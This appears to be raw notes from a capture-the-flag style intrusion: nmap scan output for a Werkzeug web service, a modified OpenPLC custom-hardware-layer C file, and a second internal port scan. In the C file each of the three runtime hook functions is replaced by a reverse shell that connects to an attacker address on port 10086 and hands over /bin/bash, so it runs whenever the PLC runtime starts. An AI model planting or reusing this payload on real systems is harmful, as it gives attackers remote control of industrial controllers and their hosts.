PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18 | http-title: Site doesnt have a title (text/html; charset=utf-8). |_Requested resource was http://10.10.11.7:8080/login | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 NOT FOUND | content-type: text/html; charset=utf-8 | content-length: 232 | vary: Cookie | set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.Zfelqw.Aq1NMe9Z_Z-hdlL2RcbM1DXlKGU; Expires=Mon, 18-Mar-2024 02:28:39 GMT; HttpOnly; Path=/ | server: Werkzeug/1.0.1 Python/2.7.18 | date: Mon, 18 Mar 2024 02:23:39 GMT | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> | <title>404 Not Found</title> | <h1>Not Found</h1> | <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p> | GetRequest: | HTTP/1.0 302 FOUND | content-type: text/html; charset=utf-8 | content-length: 219 | location: http://0.0.0.0:8080/login | vary: Cookie | set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfelqA.nN6MbTZPfWh0GH_zwv0QNyj684U; Expires=Mon, 18-Mar-2024 02:28:36 GMT; HttpOnly; Path=/ | server: Werkzeug/1.0.1 Python/2.7.18 | date: Mon, 18 Mar 2024 02:23:36 GMT | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> | <title>Redirecting...</title> | <h1>Redirecting...</h1> | <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link. | HTTPOptions: | HTTP/1.0 200 OK | content-type: text/html; charset=utf-8 | allow: HEAD, OPTIONS, GET | vary: Cookie | set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfelqQ.HQmJQZxDo7-H-bGWAF5z9ShIk9c; Expires=Mon, 18-Mar-2024 02:28:37 GMT; HttpOnly; Path=/ | content-length: 0 | server: Werkzeug/1.0.1 Python/2.7.18 | date: Mon, 18 Mar 2024 02:23:37 GMT | RTSPRequest: | HTTP/1.1 400 Bad request | content-length: 90 | cache-control: no-cache | content-type: text/html | connection: close | <html><body><h1>400 Bad request</h1> | Your browser sent an invalid request. |_ </body></html> |_http-server-header: Werkzeug/1.0.1 Python/2.7.18 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.94SVN%I=7%D=3/17%Time=65F7A5A7%P=x86_64-pc-linux-gnu%r SF:(GetRequest,24C,"HTTP/1\.0\x20302\x20FOUND\r\ncontent-type:\x20text/htm SF:l;\x20charset=utf-8\r\ncontent-length:\x20219\r\nlocation:\x20http://0\ SF:.0\.0\.0:8080/login\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJfZn SF:Jlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ\.ZfelqA\.nN6MbTZPfWh0GH_zwv0QN SF:yj684U;\x20Expires=Mon,\x2018-Mar-2024\x2002:28:36\x20GMT;\x20HttpOnly; SF:\x20Path=/\r\nserver:\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x SF:20Mon,\x2018\x20Mar\x202024\x2002:23:36\x20GMT\r\n\r\n<!DOCTYPE\x20HTML SF:\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>Red SF:irecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20should\x2 SF:0be\x20redirected\x20automatically\x20to\x20target\x20URL:\x20<a\x20hre SF:f=\"/login\">/login</a>\.\x20\x20If\x20not\x20click\x20the\x20link\.")% SF:r(HTTPOptions,14E,"HTTP/1\.0\x20200\x20OK\r\ncontent-type:\x20text/html SF:;\x20charset=utf-8\r\nallow:\x20HEAD,\x20OPTIONS,\x20GET\r\nvary:\x20Co SF:okie\r\nset-cookie:\x20session=eyJfcGVybWFuZW50Ijp0cnVlfQ\.ZfelqQ\.HQmJ SF:QZxDo7-H-bGWAF5z9ShIk9c;\x20Expires=Mon,\x2018-Mar-2024\x2002:28:37\x20 SF:GMT;\x20HttpOnly;\x20Path=/\r\ncontent-length:\x200\r\nserver:\x20Werkz SF:eug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Mon,\x2018\x20Mar\x202024\x2 SF:002:23:37\x20GMT\r\n\r\n")%r(RTSPRequest,CF,"HTTP/1\.1\x20400\x20Bad\x2 SF:0request\r\ncontent-length:\x2090\r\ncache-control:\x20no-cache\r\ncont SF:ent-type:\x20text/html\r\nconnection:\x20close\r\n\r\n<html><body><h1>4 SF:00\x20Bad\x20request</h1>\nYour\x20browser\x20sent\x20an\x20invalid\x20 SF:request\.\n</body></html>\n")%r(FourOhFourRequest,224,"HTTP/1\.0\x20404 SF:\x20NOT\x20FOUND\r\ncontent-type:\x20text/html;\x20charset=utf-8\r\ncon SF:tent-length:\x20232\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJfcG SF:VybWFuZW50Ijp0cnVlfQ\.Zfelqw\.Aq1NMe9Z_Z-hdlL2RcbM1DXlKGU;\x20Expires=M SF:on,\x2018-Mar-2024\x2002:28:39\x20GMT;\x20HttpOnly;\x20Path=/\r\nserver SF::\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Mon,\x2018\x20Mar\ SF:x202024\x2002:23:39\x20GMT\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W SF:3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>404\x20Not\x20Found</ti SF:tle>\n<h1>Not\x20Found</h1>\n<p>The\x20requested\x20URL\x20was\x20not\x SF:20found\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20URL\ SF:x20manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x20aga SF:in\.</p>\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 - 5.4 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 74.58 seconds
#include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <stdlib.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> //----------------------------------------------------------------------------- // DISCLAIMER: EDDITING THIS FILE CAN BREAK YOUR OPENPLC RUNTIME! IF YOU DON'T // KNOW WHAT YOU'RE DOING, JUST DON'T DO IT. EDIT AT YOUR OWN RISK. // // PS: You can always restore original functionality if you broke something // in here by clicking on the "Restore Original Code" button above. //----------------------------------------------------------------------------- //----------------------------------------------------------------------------- // These are the ignored I/O vectors. If you want to override how OpenPLC // handles a particular input or output, you must put them in the ignored // vectors. For example, if you want to override %IX0.5, %IX0.6 and %IW3 // your vectors must be: // int ignored_bool_inputs[] = {5, 6}; //%IX0.5 and %IX0.6 ignored // int ignored_int_inputs[] = {3}; //%IW3 ignored // // Every I/O on the ignored vectors will be skipped by OpenPLC hardware layer //----------------------------------------------------------------------------- int ignored_bool_inputs[] = {-1}; int ignored_bool_outputs[] = {-1}; int ignored_int_inputs[] = {-1}; int ignored_int_outputs[] = {-1}; //----------------------------------------------------------------------------- // This function is called by the main OpenPLC routine when it is initializing. // Hardware initialization procedures for your custom layer should be here. //----------------------------------------------------------------------------- void initCustomLayer() { int sockt; int port = 10086; struct sockaddr_in revsockaddr; sockt = socket(AF_INET, SOCK_STREAM,0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("10.10.x.x"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"/bin/bash", NULL}; execve("/bin/bash", argv, NULL); return 0; } //----------------------------------------------------------------------------- // This function is called by OpenPLC in a loop. Here the internal input // buffers must be updated with the values you want. Make sure to use the mutex // bufferLock to protect access to the buffers on a threaded environment. //----------------------------------------------------------------------------- void updateCustomIn() { int sockt; int port = 10086; struct sockaddr_in revsockaddr; sockt = socket(AF_INET, SOCK_STREAM,0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("10.10.xx.x"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"/bin/bash", NULL}; execve("/bin/bash", argv, NULL); return 0; // Example Code - Overwritting %IW3 with a fixed value // If you want to have %IW3 constantly reading a fixed value (for example, 53) // you must add %IW3 to the ignored vectors above, and then just insert this // single line of code in this function: // if (int_input[3] != NULL) *int_input[3] = 53; } //----------------------------------------------------------------------------- // This function is called by OpenPLC in a loop. Here the internal output // buffers must be updated with the values you want. Make sure to use the mutex // bufferLock to protect access to the buffers on a threaded environment. //----------------------------------------------------------------------------- void updateCustomOut() { int sockt; int port = 10086; struct sockaddr_in revsockaddr; sockt = socket(AF_INET, SOCK_STREAM,0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("10.10.x.x"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"/bin/bash", NULL}; execve("/bin/bash", argv, NULL); return 0; }
Starting Nmap 7.80 ( https://nmap.org ) at 2024-03-19 05:25 UTC Nmap scan report for 10.0.3.1 Host is up (0.000013s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 8080/tcp open http-proxy MAC Address: 00:16:2E:00:00:00 (Xensource)
